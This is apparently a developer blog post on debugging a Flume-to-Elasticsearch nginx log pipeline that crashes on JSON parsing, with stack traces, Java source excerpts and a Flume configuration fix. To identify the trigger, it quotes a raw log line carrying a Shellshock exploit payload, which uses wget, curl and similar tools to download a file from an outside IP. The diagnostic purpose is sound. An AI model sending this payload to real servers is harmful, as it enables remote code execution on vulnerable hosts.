Flume nginx log processing exception: JsonParseException: Unexpected character ('(' (code 40)): expected a valid value


Recently our Flume pipeline for nginx logs has been breaking every few days with a JSON deserialization exception.

Exception stack trace:

2016/01/26 14:37:49.043 [ERROR] [] [] [SinkRunner-PollingRunner-DefaultSinkProcessor] [org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:160)]  Unable to deliver event. Exception follows.
org.apache.flume.EventDeliveryException: Failed to commit transaction. Transaction rolled back.
    at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:227)
    at org.apache.flume.sink.DefaultSinkProcessor.process(DefaultSinkProcessor.java:68)
    at org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:147)
    at java.lang.Thread.run(Thread.java:745)
Caused by: org.elasticsearch.common.jackson.core.JsonParseException: Unexpected character ('(' (code 40)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')
 at [Source: [B@78f004c9; line: 1, column: 2]
    at org.elasticsearch.common.jackson.core.JsonParser._constructError(JsonParser.java:1487)
    at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:518)
    at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportUnexpectedChar(ParserMinimalBase.java:447)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._handleUnexpectedValue(UTF8StreamJsonParser.java:2485)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._nextTokenNotInObject(UTF8StreamJsonParser.java:801)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser.nextToken(UTF8StreamJsonParser.java:697)
    at org.elasticsearch.common.xcontent.json.JsonXContentParser.nextToken(JsonXContentParser.java:51)
    at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.addComplexField(ContentBuilderUtil.java:60)
    at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.appendField(ContentBuilderUtil.java:47)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.appendHeaders(ElasticSearchLogStashEventSerializer.java:131)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:80)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:73)
    at org.apache.flume.sink.elasticsearch.client.ElasticSearchTransportClient.addEvent(ElasticSearchTransportClient.java:164)
    at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:189)

Tracing into the code (the `appendHeaders` frame in the stack trace):

builder.startObject("@fields");
for (String key : headers.keySet()) {
  byte[] val = headers.get(key).getBytes(charset);
  ContentBuilderUtil.appendField(builder, key, val);
}

So the failure happens during serialization, in ContentBuilderUtil:

public static void appendField(XContentBuilder builder, String field,
      byte[] data) throws IOException {
    XContentType contentType = XContentFactory.xContentType(data);
    if (contentType == null) {
      addSimpleField(builder, field, data);
    } else {
      addComplexField(builder, field, contentType, data);
    }
  }
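The branch above can be paraphrased without the Elasticsearch types (a minimal sketch; `sniffType` and `path` are illustrative names, not the real API): if the content-type sniffer returns null the header value is written as a plain string, otherwise it is handed to a real JSON parser via `addComplexField`.

```java
public class AppendFieldSketch {
    // Stand-in for XContentFactory.xContentType: null means "not structured".
    // (Illustrative only; the real sniffer also detects formats besides JSON.)
    static String sniffType(byte[] data) {
        for (byte b : data) {
            if (b == '{') {
                return "JSON";
            }
        }
        return null;
    }

    // Which branch of appendField a given header value would take.
    public static String path(byte[] data) {
        return sniffType(data) == null ? "addSimpleField" : "addComplexField";
    }
}
```

A value that takes the `addComplexField` path but is not actually valid JSON is exactly what produces the JsonParseException above.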

`XContentFactory.xContentType(data)` guesses the content type of each header value. Judging from the stack trace, it decided this value was JSON. Looking at how JSON is detected inside it, there is this piece of code:

// a last chance for JSON
for (int i = 0; i < length; i++) {
    if (bytes.get(i) == '{') {
        return XContentType.JSON;
    }
}
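The loop can be exercised in isolation (a standalone copy of the scan, not the real XContentFactory): any `{` anywhere in the value, even deep inside a user-agent string, is enough to classify the whole value as JSON, after which the real parser fails on the leading `(` (code 40), exactly as in the stack trace.

```java
public class LastChanceJson {
    // Same logic as the "last chance for JSON" loop above:
    // a '{' at any position makes the whole value sniff as JSON.
    public static boolean sniffsAsJson(byte[] bytes) {
        for (byte b : bytes) {
            if (b == '{') {
                return true;
            }
        }
        return false;
    }
}
```

Note that an ordinary browser user agent such as `Mozilla/5.0 (Windows NT 6.1)` contains `(` but no `{`, so it is unaffected; only values with a brace somewhere take the broken path.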

No wonder it breaks. Searching the logs for the entries that trigger the exception:

54.204.47.156 - - [2016-01-19T12:50:57+08:00] "GET /index.cgi HTTP/1.1" 301 184 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  \x22);'" "-" "5.000" "-" "-"

So the userAgent string contains a `{` (the `() { :;};` prefix is a Shellshock-style probe). The fix is to add a search_replace interceptor that escapes it:

agent.sources.www.type = exec 
agent.sources.www.command = tail -F -n 0 /data/nginx/logs/www.longdai.com.log
agent.sources.www.restart = true
agent.sources.www.logStdErr = true
agent.sources.www.batchSize = 200
agent.sources.www.channels = fch

agent.sources.www.interceptors = cdn sr www i1 
agent.sources.www.interceptors.www.type = static
agent.sources.www.interceptors.www.key = app
agent.sources.www.interceptors.www.value = www
agent.sources.www.interceptors.cdn.type = regex_filter
agent.sources.www.interceptors.cdn.regex = .*\\s+\\"ChinaCache\\"\\s+.*
agent.sources.www.interceptors.cdn.excludeEvents = true

agent.sources.www.interceptors.sr.type=search_replace
agent.sources.www.interceptors.sr.searchPattern=\\{
agent.sources.www.interceptors.sr.replaceString=%7b
agent.sources.www.interceptors.sr.charset=UTF-8
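The effect of the `sr` interceptor can be sketched as a plain `replaceAll` over the event body (a simplification; the real SearchAndReplaceInterceptor applies the configured `searchPattern`/`replaceString` pair in essentially this way):

```java
public class SearchReplaceSketch {
    // searchPattern = \{  ->  replaceString = %7b, as configured above.
    public static String sanitize(String body) {
        return body.replaceAll("\\{", "%7b");
    }
}
```

After this substitution no `{` survives in any header value, so `xContentType` returns null and every value goes down the safe `addSimpleField` path.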

agent.sources.www.interceptors.i1.type = regex_extractor
agent.sources.www.interceptors.i1.regex = ([^\\s]*)\\s-\\s([^\\s]*)\\s\\[(.*)\\]\\s+\\"([\\S]*)\\s+([\\S]*)\\s+[\\S]*\\"\\s+(\\d+)\\s+(\\d+)\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"
agent.sources.www.interceptors.i1.serializers = s1 s2 s3 s4 s5 s6 s7 s8 s9 s10 s11 s12 s13
agent.sources.www.interceptors.i1.serializers.s1.name = remote_addr
agent.sources.www.interceptors.i1.serializers.s2.name = remote_user
agent.sources.www.interceptors.i1.serializers.s3.name = datetime
#agent.sources.www.interceptors.i1.serializers.s3.type = org.apache.flume.interceptor.RegexExtractorInterceptorMillisSerializer
#agent.sources.www.interceptors.i1.serializers.s3.name = timestamp
#agent.sources.www.interceptors.i1.serializers.s3.pattern = yyyy-MM-dd'T'HH:mm:ssZ
agent.sources.www.interceptors.i1.serializers.s4.name = http_method
agent.sources.www.interceptors.i1.serializers.s5.name = uri
agent.sources.www.interceptors.i1.serializers.s6.name = status
agent.sources.www.interceptors.i1.serializers.s7.name = body_length
agent.sources.www.interceptors.i1.serializers.s8.name = http_referer
agent.sources.www.interceptors.i1.serializers.s9.name = user_agent
agent.sources.www.interceptors.i1.serializers.s10.name = http_x_forwarded_for
agent.sources.www.interceptors.i1.serializers.s11.name = request_time
agent.sources.www.interceptors.i1.serializers.s12.name = upstream_addr
agent.sources.www.interceptors.i1.serializers.s13.name = upstream_response_time
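For reference, a simplified, hypothetical subset of the `i1` regex (only the first seven fields; the real one also captures referer, user_agent, x_forwarded_for and the timing fields) can be exercised directly with `java.util.regex`:

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class NginxLineSketch {
    // Captures: remote_addr, remote_user, datetime, http_method, uri,
    // status, body_length -- the same field names as serializers s1..s7.
    static final Pattern LINE = Pattern.compile(
        "(\\S+)\\s-\\s(\\S+)\\s\\[(.*?)\\]\\s+\"(\\S+)\\s+(\\S+)\\s+\\S+\"\\s+(\\d+)\\s+(\\d+).*");

    public static String[] parse(String line) {
        Matcher m = LINE.matcher(line);
        if (!m.matches()) {
            return null;
        }
        String[] fields = new String[7];
        for (int i = 0; i < 7; i++) {
            fields[i] = m.group(i + 1);
        }
        return fields;
    }
}
```

This is only a sanity-check harness for the capture groups; the production config keeps the full pattern shown above.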

agent.sources.www.interceptors.i2.type = timestamp
agent.sources.www.interceptors.i3.type = host
agent.sources.www.interceptors.i3.hostHeader = hostname


agent.sinks.elasticSearch.type = org.apache.flume.sink.elasticsearch.ElasticSearchSink
agent.sinks.elasticSearch.channel = fch
agent.sinks.elasticSearch.batchSize = 2000
agent.sinks.elasticSearch.hostNames = 172.16.0.18:9300
agent.sinks.elasticSearch.indexName = nginx
agent.sinks.elasticSearch.indexType = nginx
agent.sinks.elasticSearch.clusterName = longdai 
agent.sinks.elasticSearch.client = transport
agent.sinks.elasticSearch.serializer = org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer

The full Flume configuration for processing nginx logs is described here:

http://blog.csdn.net/lanmo555/article/details/50483561
